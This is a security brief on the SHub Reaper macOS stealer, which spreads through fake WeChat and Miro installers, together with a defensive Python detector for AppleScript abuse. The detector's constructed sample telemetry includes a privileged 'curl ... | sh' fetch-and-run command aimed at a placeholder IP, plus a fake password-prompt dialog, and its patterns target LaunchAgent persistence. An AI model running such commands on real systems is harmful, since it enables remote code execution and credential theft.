Stealer Spoofs Google, Microsoft & Apple to Backdoor macOS via Fake WeChat and Miro Installers
What Happened – The SHub Reaper “stealer” is distributed as counterfeit WeChat and Miro installers; once run, it uses an AppleScript payload to establish persistence on the macOS device and exfiltrate user credentials.
Why It Matters for TPRM –
- Expands the attack surface of third‑party software supply chains on macOS.
- Enables credential theft that can be leveraged for lateral movement into partner networks.
- Highlights the need for stricter code‑signing verification and endpoint monitoring across all vendors.
Who Is Affected – Enterprises with macOS endpoints (technology SaaS, financial services, education, healthcare, and any organization allowing BYOD).
Recommended Actions – Review and harden vendor onboarding controls for macOS applications, verify code signing and notarization of every installer before it is approved for deployment, block the known malicious installer download URLs, and deploy endpoint detection that alerts on AppleScript (osascript) execution spawned by unsigned or freshly downloaded installers.
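The last recommended action, endpoint detection that watches AppleScript execution, can be illustrated with the rule logic below. This is an added example written for this brief, not code from the Dark Reading report, the researchers, or any EDR vendor. The NDJSON telemetry, its field names, the paths, PIDs and the 203.0.113.10 address are all constructed for the example, and the rules encode generic macOS stealer tradecraft (osascript spawned by an unsigned installer running from a mounted disk image, a hidden-answer password dialog, a privileged `do shell script`, a LaunchAgent plist write) rather than confirmed SHub Reaper indicators.

```python
"""Detection logic for AppleScript-driven fake-installer activity on macOS.

Added example, not code from the report. Telemetry shape, paths and the
abuse patterns are assumptions chosen to illustrate the detection idea.
"""
import json
import re
from dataclasses import dataclass

# Locations a freshly downloaded or mounted installer typically runs from.
UNTRUSTED_DIRS = ("/Volumes/", "/private/tmp/", "/tmp/", "/Downloads/")
OSASCRIPT = "/usr/bin/osascript"

# Generic AppleScript abuse patterns (assumptions of this example).
PASSWORD_PROMPT = re.compile(r"display dialog.*with hidden answer", re.I | re.S)
PRIV_SHELL = re.compile(r"do shell script.*with administrator privileges", re.I | re.S)
PERSIST_PATH = re.compile(r"/Library/(LaunchAgents|LaunchDaemons)/[^/]+\.plist$")

# Constructed NDJSON telemetry in a generic EDR-like shape; nothing here is real.
SAMPLE_EVENTS = r"""
{"ts":1,"type":"process","pid":501,"ppid":1,"exe":"/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor","signed":true,"cmdline":"Script Editor"}
{"ts":2,"type":"process","pid":502,"ppid":501,"exe":"/usr/bin/osascript","signed":true,"cmdline":"osascript /Users/alice/Documents/rename.scpt"}
{"ts":3,"type":"process","pid":600,"ppid":1,"exe":"/Volumes/WeChat Installer/Install WeChat.app/Contents/MacOS/Install WeChat","signed":false,"cmdline":"Install WeChat"}
{"ts":4,"type":"process","pid":601,"ppid":600,"exe":"/usr/bin/osascript","signed":true,"cmdline":"osascript -e 'display dialog \"macOS needs your password to finish installing\" default answer \"\" with hidden answer'"}
{"ts":5,"type":"process","pid":602,"ppid":600,"exe":"/usr/bin/osascript","signed":true,"cmdline":"osascript -e 'do shell script \"curl -s http://203.0.113.10/p | sh\" with administrator privileges'"}
{"ts":6,"type":"file_write","pid":602,"ppid":600,"path":"/Users/alice/Library/LaunchAgents/com.example.update.plist"}
"""


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def _load(ndjson: str):
    events = [json.loads(line) for line in ndjson.splitlines() if line.strip()]
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    return events, procs


def parent_untrusted(proc: dict) -> bool:
    """True for an unsigned binary, or one running from a DMG/temp/download path."""
    exe = proc.get("exe", "")
    return not proc.get("signed", False) or any(d in exe for d in UNTRUSTED_DIRS)


def detect(ndjson: str) -> list[Finding]:
    """Run the rules over the event stream and return every match."""
    events, procs = _load(ndjson)
    findings: list[Finding] = []
    for e in events:
        parent = procs.get(e.get("ppid"))
        if e["type"] == "process" and e["exe"] == OSASCRIPT:
            # osascript itself is Apple-signed, so the signal is who launched it.
            if parent is None or parent_untrusted(parent):
                findings.append(Finding("osascript_from_untrusted_parent", e["pid"],
                                        parent["exe"] if parent else "parent not observed"))
            cmd = e.get("cmdline", "")
            if PASSWORD_PROMPT.search(cmd):
                findings.append(Finding("applescript_password_prompt", e["pid"], cmd))
            if PRIV_SHELL.search(cmd):
                findings.append(Finding("privileged_do_shell_script", e["pid"], cmd))
        elif e["type"] == "file_write" and PERSIST_PATH.search(e.get("path", "")):
            writer = procs.get(e["pid"])
            # Persistence written by osascript, or by any child of an untrusted parent.
            if writer and (writer["exe"] == OSASCRIPT or (parent and parent_untrusted(parent))):
                findings.append(Finding("launch_agent_persistence", e["pid"], e["path"]))
    return findings


def by_installer(ndjson: str) -> dict[str, int]:
    """Roll findings up to the non-osascript ancestor that launched them."""
    _, procs = _load(ndjson)
    counts: dict[str, int] = {}
    for f in detect(ndjson):
        p = procs.get(f.pid)
        while p and p["exe"] == OSASCRIPT and p.get("ppid") in procs:
            p = procs[p["ppid"]]
        key = p["exe"] if p else "unknown"
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.rule:32} pid={f.pid} {f.detail}")
    print(by_installer(SAMPLE_EVENTS))
```

The benign Script Editor run (pid 502) produces nothing, while the unsigned installer mounted from a disk image accounts for all five findings; rolling findings up to the launching installer is what lets an analyst tie the AppleScript activity back to the counterfeit package. For the code-signing and notarization action, the checks to run on a candidate installer before approval are `spctl --assess --type install <pkg>` for packages, `codesign --verify --deep --strict <app>` for bundles, and `xcrun stapler validate` for the stapled notarization ticket.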
Technical Notes – Attack vector: phishing‑style distribution via counterfeit installers; execution via AppleScript; data types stolen include login credentials, session tokens, and potentially corporate documents. No specific CVE cited. Source: Dark Reading